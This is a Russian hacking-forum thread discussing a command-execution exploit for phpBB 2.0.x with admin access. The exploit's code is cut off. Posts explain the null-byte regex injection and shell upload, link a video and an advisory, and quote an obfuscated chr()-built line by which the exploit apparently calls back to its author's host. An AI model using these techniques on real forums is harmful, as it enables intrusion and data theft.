![]() |
phpBB admin =>2.0.19 exec exploit
зашел на rst.void.ru сегодня и увидел это:
пока не тестировал, Код:
#!/usr/bin/perl |
хмм
Цитата:
|
Наверное как всегда надо его подправить +))
|
Кто ещё проверял? у меня не работает...
|
2 0verfe1 - А что значит =>2.0.19 ? RST что исходники будущих версий форума где-то надыбали? А вообще возникли вопросы, хотелось бы получить ответы:
1) $sid = $1. Что значит переменная 1? Такое имя возможно? 2) $cmd=$_; Это что за констракт такой забавный? 3) '(.+)/e\0' Важно ли здесь чтобы нуль-байт был %00? Или оно все-равно в итоге таким как в сплоите станет? |
Кстати, просьба тем, кто удачно заюзал сплойт, отписаться сюда - на каких версиях, кроме указанных в сплойте, он работает.
P. S. По-моему, ограничений на сплойт нет, да? В плане, модов, версий и т. п. |
ничего нового..старый добрый нулевой байт а подписи профайла..все это можно и ручками проделать имея доступ к админке форума,
|
что с помощью него можно сделать.
для сплоита нужен пас админа, что-то не понимаю для чего он тогда предназначен? |
andre: Он команды выполняет
|
2 Grrl Мог бы отписаться на форуме как это ручками организовать можно? По-моему, исходники страницы в профайле редить надо, а как?
|
Цитата:
|
Цитата:
|
и как же ты зальешь шелл имея админку?
|
Упс, забыл что в пхпбб нельзя залить через смайлик, виноват
|
Все работает...
И с сюрпризом :) |
DetMyl
И в чём же сюрприз? :). Кались давай :). |
Да, колитесь, где surprise? :D
|
Цитата:
Нейтрализуется он очень просто, надо просто внимательно почитать исходник. Исправления я здесь постить не буду, т.к. считаю что если встроили такую фишку, и хацкер не может ее просечь, значит надо:) Но дам пару подсказок: 1) Обращаем внимание на IDS 2) Читаем ВНИМАТЕЛЬНО about но если бензина не хватит, пишите в приват:) |
просмотрела внимателно сорец действительно там сюрприз причем оригинально замаскирован
так что подчищайте сорцы прежде чем юзать подсказок DetMyl более чем достаточно даже для новичков... |
Цитата:
|
Цитата:
Руками =) |
Цитата:
|
Я мало что понимаю в хаке, так что если не правильно то плиз скажите:
это в этой строке? $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids); |
Да, в этой строке. Но не только.
|
Мне, некак неработают :( .
Ктонебутб сделаите видео, очен надо. |
Точно не работает на 2.0.16 - там что-то по другому.
По-моему, 2.0.16 - самый крепкий из всех 2.0.х =) Даже с пассом админа мало что сделаешь. Вот бы кто видео снял, как ломать 16-й пхпбб, а то так и забросить это дело можно. |
Цитата:
http://video.antichat.ru/file178.html тоже самое ручками P.S. не обязательно сливать всю базу - достаточно одного запроса update P.P.S. привет rst, посещайте античат по чаще и всё у вас будет :) |
Цитата:
|
Цитата:
Залить шелл: http://packetstormsecurity.org/0604-...hpbb-admin.txt |
И я только что прогу на php написал, всё интуитивно понятно.
chr(105) = i chr(100) = d chr(115) = s А прогу качай ЗДЕСЬ |
| Время: 07:07 |